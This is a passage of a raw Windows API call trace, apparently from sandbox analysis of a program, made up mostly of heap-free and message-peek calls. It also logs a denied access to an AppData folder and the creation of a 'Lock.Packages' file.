dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0176.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0176.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75380 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69970 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0176.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0176.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0176.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0176.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0176.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0176.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0176.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0176.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0176.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0176.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0176.768] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Packages" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.768] GetLastError () returned 0x5 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0176.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0176.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0176.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0176.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0176.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0176.772] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0176.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0176.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Packages" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.packages"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0176.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0176.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0176.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0176.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0176.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0176.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0176.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0176.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.823] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0176.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.823] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0176.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.823] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0176.823] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.823] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0176.823] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.823] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.824] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0176.824] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.824] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0176.824] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.824] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0176.824] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.824] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0176.824] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 